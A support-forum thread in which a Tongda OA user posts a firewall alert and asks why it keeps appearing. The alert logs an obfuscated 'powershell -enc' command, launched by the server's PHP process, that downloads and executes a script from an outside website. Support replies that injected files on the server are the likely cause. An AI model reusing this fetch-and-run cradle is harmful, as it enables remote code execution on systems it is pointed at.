火绒防火墙报安全问题

sikma_5

2020-05-20 10:05:41,系统防护,系统加固,cmd.exe触犯敏感动作防护规则, 已阻止


操作进程：C:\Windows\SysWOW64\cmd.exe
命令行：cmd /c powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbgBhAG8AcwBiAGkAbwAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBtAGEAaQBuAC8AagBzAC8AYQB4AC4AdAB4AHQAJwApAA==
父进程：D:\MYOA\bin\php-cgi.exe
防护项目：利用PowerShell执行可疑脚本
执行文件：C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
执行命令行：powershell  -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbgBhAG8AcwBiAGkAbwAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBtAGEAaQBuAC8AagBzAC8AYQB4AC4AdAB4AHQAJwApAA==
操作结果：已阻止


请问这个是什么情况，2017版，已经打了最新的A2补丁，隔一段时间就会出这个警告两周前就已经打电话报给客服了，但是没有任何回复

通达曾圆圆

您好，您到OA服务器安装目录，找到下图中的这几个路径下，点进去看看有没有文件名带有“ .f ”  .1 “”的文件，配合看下文件的修改时间，这些文件可能是之前已经注入的文件 导致的该现象，您把这些文件剪切到其他移动硬盘，不要放在服务器上。

sikma_5

通达曾圆圆 发表于 2020-5-22 16:59
您好，您到OA服务器安装目录，找到下图中的这几个路径下，点进去看看有没有文件名带有“ .f ”  .1 “”的 ...

您好，我没看到您说的.f和.1的文件，不知道这个哪些是有用的，另外，您说的那个interface的目录我没有看到

通达曾圆圆

sikma 发表于 2020-5-23 10:39
您好，我没看到您说的.f和.1的文件，不知道这个哪些是有用的，另外，您说的那个interface的目录我没有看 ...

您好，这些文件您拷贝到其他目录，然后修改文件后缀名为.txt，然后使用文本打开看能否打开，打开内容是不是一段代码，是的话建议这些文件可以删了。